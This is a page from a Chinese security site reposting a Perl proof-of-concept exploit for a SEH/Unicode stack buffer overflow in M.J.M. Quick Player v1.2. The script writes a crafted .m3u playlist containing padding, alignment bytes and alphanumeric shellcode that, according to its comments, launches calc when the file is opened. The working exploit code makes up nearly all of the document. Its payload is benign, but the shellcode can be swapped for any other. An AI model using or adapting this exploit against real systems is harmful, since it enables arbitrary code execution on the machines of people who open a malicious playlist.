首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
M.J.M. Quick Player v1.2 Stack BOF
来源:vfocus.net 作者: corelanc0d3r 发布时间:2010-01-04   
# [*] Vulnerability     : M.J.M. Quick Player v1.2 Stack BOF
# [*] Discovered by     : mr_me (seeleymagic[at]hotmail[dot]com)
# [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit released   : dec 28th, 2009
# [*] Type              : local and remote code execution
# [*] OS                : Windows
# [*] Product           : M.J.M. Quick Player
# [*] Versions affected : 1.2  (Latest version is not vulnerable)
# [*] Download from     : http://www.brothersoft.com/quick-player-135853.html
# [*] -------------------------------------------------------------------------
# [*] Method            : SEH / Unicode
# [*] Tested on         : XP SP3 En (VirtualBox)
# [*] Greetz&Tx to      : mr_me/EdiStrosar/Rick2600/MarkoT
# [*] -------------------------------------------------------------------------
#                                               MMMMM~.                          
#                                               MMMMM?.                          
#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
#                                                                   eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty. 
# Use for educational purposes only.
#
# Open file in playlist - calc !
#
print "[+] Preparing payload\n";
my $sploitfile="corelanc0d3r_quicksploit.m3u";
my $header="#EXTM3U\n\nHTTP://";
my $junk="A" x 529;
my $field1="\x41\x6d";
my $field2="\x41\x4d";  #boy I love pvefindaddr :-)
my $stuff="\x58\x6d";
$stuff=$stuff."\x05\x02\x01\x6d";
$stuff=$stuff."\x2d\x01\x01\x6d";
$stuff=$stuff."\x50\x6d\xc3";  
my $morestuff="D" x 111;
# I think this will execute calc :-)
my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBTKJL2HO0QU48QUQXBC1Q2L2C4MPEL80P6XLMO53VSLKOHPP1WSKOXPA";
my $payload=$header.$junk.$field1.$field2.$stuff.$morestuff.$shellcode;
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $payload;
close(FILE);
print "[+] Wrote ".length($payload)." bytes to ".$sploitfile."\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ReGet Deluxe 5.2 (build 330) S
·Joomla Component com_calendari
·JetAudio Basic 7.5.5.25 .asx B
·win32/xp sp2 (En + Ar) cmd.exe
·jetAudio v 8.0.0.0 Basic Local
·Sunbyte e-Flower SQL Injection
·linux/x86 unlink(/etc/passwd)
·Dren's PHP Uploader Remote Fil
·BigAnt Server 2.52 SEH (0day)
·CastRipper (.M3U) Stack BOF Wi
·CommonSense CMS XSS Vulnerabil
·Exploit Easy RM to MP3 2.7.3.7
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved